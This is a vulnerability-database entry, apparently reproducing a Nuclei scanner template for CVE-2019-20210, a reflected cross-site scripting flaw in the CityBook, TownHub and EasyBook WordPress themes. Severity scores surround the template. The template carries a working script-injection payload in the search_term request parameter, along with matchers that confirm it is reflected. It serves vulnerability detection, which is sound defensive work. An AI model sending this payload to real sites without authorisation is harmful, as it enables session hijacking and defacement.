Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-20210
HistoryJun 16, 2022 - 5:38 a.m.

WordPress CTHthemes - Cross-Site Scripting

2022-06-1605:38:51
ProjectDiscovery
github.com
7
cve2019
wordpress
citybook
xss
cththemes
medium-severity

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.009

Percentile

83.1%

WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
id: CVE-2019-20210

info:
  name: WordPress CTHthemes - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
  impact: |
    Successful exploitation of this vulnerability can lead to session hijacking, defacement of the website, theft of sensitive information, or the installation of malware on the victim's system.
  remediation: |
    Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/10013
    - https://wpvulndb.com/vulnerabilities/10018
    - https://cxsecurity.com/issue/WLB-2019120112
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
    - https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-20210
    cwe-id: CWE-79
    epss-score: 0.00938
    epss-percentile: 0.83041
    cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: cththemes
    product: citybook
    framework: wordpress
  tags: cve,cve2019,wp-theme,wpscan,wordpress,citybook,xss,cththemes

http:
  - method: GET
    path:
      - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"
          - "/wp-content/themes/citybook"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d8f5eff7bca85ed1b36cb2f33b5bcb13567551fd4de1a132441c2807c0d65df9022100ad45f03be3ef1bd869708b1fdeeefedad02b75fa3a6f1d3436d96859384b99c4:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.009

Percentile

83.1%